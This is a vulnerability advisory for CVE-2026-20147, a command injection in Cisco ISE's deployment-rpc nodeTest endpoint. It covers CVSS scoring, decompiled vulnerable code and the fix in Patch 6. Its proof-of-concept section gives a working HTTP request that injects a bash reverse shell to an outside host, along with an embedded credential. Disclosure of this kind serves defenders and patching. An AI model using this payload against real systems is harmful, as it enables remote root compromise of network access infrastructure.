(CVE-2026-20147) Cisco Identity Services Engine Authenticated Command Injection in Deployment-RPC Leading to Remote Code Execution
CVE: CVE-2026-20147
Affected Versions: Cisco ISE / ISE-PIC 3.4 prior to Patch 6 (and equivalently 3.1 < P11, 3.2 < P10, 3.3 < P11, 3.5 < P3; releases earlier than 3.1 must migrate)
CVSS3.1: 9.1 (Critical) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Related: This advisory covers only CVE-2026-20147. Cisco’s bulletin cisco-sa-ise-rce-traversal-8bYndVrZ bundles a second, unrelated issue — CVE-2026-20148, an authenticated path traversal / arbitrary file read (Medium, CVSS 4.9) — which is not analysed here.
Summary
| Product | Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) |
|---|---|
| Vendor | Cisco |
| Severity | Critical - an authenticated remote attacker can execute arbitrary commands on the underlying operating system and escalate to root |
| Affected Versions | Cisco ISE / ISE-PIC 3.4 prior to Patch 6 (and equivalently 3.1 < P11, 3.2 < P10, 3.3 < P11, 3.5 < P3) |
| Tested Versions | Cisco ISE 3.4 Patch 5 |
| CVE Identifier | CVE-2026-20147 |
| CVE Description | Insufficient validation of user-supplied input in the deployment-rpc nodeTest method allows an authenticated administrative attacker to inject OS commands via the restartNodes parameter, achieving remote code execution as root |
| CWE Classification(s) | CWE-77: Improper Neutralization of Special Elements used in a Command (‘Command Injection’) (more specifically CWE-78: OS Command Injection) |
CVSS3.1 Scoring System
Base Score: 9.1 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | High |
| User Interaction (UI) | None |
| Scope (S) | Changed |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Note on scoring: Cisco’s published advisory (cisco-sa-ise-rce-traversal-8bYndVrZ) rates CVE-2026-20147 at 9.9 (Critical) with
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. Our assessment differs only on Privileges Required: because exploitation requires valid administrative credentials, we assess PR as High, yielding a base score of 9.1.
Vulnerability Summary
The nodeTest method in deployment-rpc is vulnerable to command injection, as it directly concatenates unsanitized user input into shell commands. An authenticated administrative attacker can leverage this to execute arbitrary commands on the underlying operating system and escalate privileges to root. On single-node deployments, exploitation can additionally render the ISE node unavailable, causing a denial-of-service condition in which unauthenticated endpoints cannot access the network until the node is restored.
Vulnerability Details
At [1], the nodeTest method in apache-tomcat/webapps/deployment-rpc/WEB-INF/classes/com/cisco/cpm/infrastructure/deployment/rpc/NodeRestartListener.class passes the user-supplied restartNodes parameter to RestartUtil.invokeScript:
private void nodeTest(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
PrintWriter var3 = var2.getWriter();
RestartUtil.getInstance().invokeScript(var1.getParameter("restartMode"), var1.getParameter("restartNodes")); // [1]
var3.close();
}
Within the invokeScript method (apache-tomcat/lib/systemconfig-3.4.0-608.jar!/com/cisco/cpm/infrastructure/systemconfig/RestartUtil.class), unsanitized user input is directly concatenated into the shell command at [3], leading to arbitrary command execution:
public void invokeScript(String var1, String var2) throws RestartUtilException {
String var3 = "0";
// ...
this.invokeScript(var1, var3, var2); // [2]
}
public void invokeScript(String var1, String var2, String var3) throws RestartUtilException {
// ...
ProcessBuilder var10 = new ProcessBuilder(new String[]{"bash", "-c", var9 + " -Dise.fipsMode=true -cp " + var13 + ":" + "/opt/CSCOcpm/appsrv/apache-tomcat" + "/lib/* " + RestartUtil.class.getCanonicalName() + " " + var1 + " " + var2 + " " + var3 + " >> " + "/opt/CSCOcpm/logs/restartutil.log" + " 2>&1"});
var10.redirectErrorStream(true);
GenericUtil.log("RestartUtil: Process builder starting with RestartMode:RestartSequence:RestartNodes=" + var1 + ":" + var2 + ":" + var3);
var10.start(); // [3]
// ...
}
The restartNodes value flows unmodified into the bash -c command string, so any shell metacharacters it contains are interpreted by the shell.
Proof-of-Concept
This request injects a reverse shell payload via the restartNodes parameter using $() command substitution, authenticating with the plaintext password obtained from ISE-HIGH-01:
GET /deployment-rpc/nodeTest/?restartMode=apponly&restartNodes=$(<@urlencode_not_plus>bash -i >& /dev/tcp/10.0.20.40/8000 0>&1</@urlencode_not_plus>).x HTTP/1.0
Authorization: Basic <@base64>~internal-alertmanager-ise-api:4KlG3(,s</@base64>
Accept: */*
Connection: close
Patch Analysis
In P5, RestartUtil.invokeScript() passes user input (str3, the restartNodes parameter) through bash -c as part of a concatenated command string, allowing shell metacharacter interpretation:
ProcessBuilder processBuilder = new ProcessBuilder(
"bash", "-c",
(System.getProperty("java.home") + property + "bin" + property + "java") +
" -Dise.fipsMode=true -cp " + System.getProperty("java.class.path") + ":" +
APACHE_HOME + "/lib/* " + RestartUtil.class.getCanonicalName() + " " +
str + " " + str2 + " " + str3 + " >> " + RestartLog + " 2>&1");
In P6, the bash -c shell invocation is removed. User input is now passed as separate array arguments directly to the Java binary, bypassing shell interpretation entirely:
ProcessBuilder processBuilder = new ProcessBuilder(
System.getProperty("java.home") + property + "bin" + property + "java",
"-Dise.fipsMode=true",
"-cp",
System.getProperty("java.class.path") + ":" + APACHE_HOME + "/lib/*",
RestartUtil.class.getCanonicalName(),
str, str2, str3);
Shell metacharacters such as $() and ; in str3 are no longer evaluated. No bypass identified.
Credit
This vulnerability was discovered by Li Jiantao and Tevel Sho (intern) of STAR Labs SG Pte. Ltd.
We reported this issue to Cisco after it had already been received from another reporter, and as such we were not officially credited in Cisco’s advisory. Cisco’s published advisory (cisco-sa-ise-rce-traversal-8bYndVrZ) credits Jonathan Lein of TrendAI Research. We are publishing this advisory to document our independent discovery and analysis.
Timeline
- 2026-04-15 - Cisco publishes advisory cisco-sa-ise-rce-traversal-8bYndVrZ (Version 1.0)
- 2026-04-28 - Cisco updates advisory to Version 1.1 (fixed release availability)
- 2026-05-04 - STAR Labs reports the vulnerability to Cisco PSIRT
- 2026-06-08 - STAR Labs public disclosure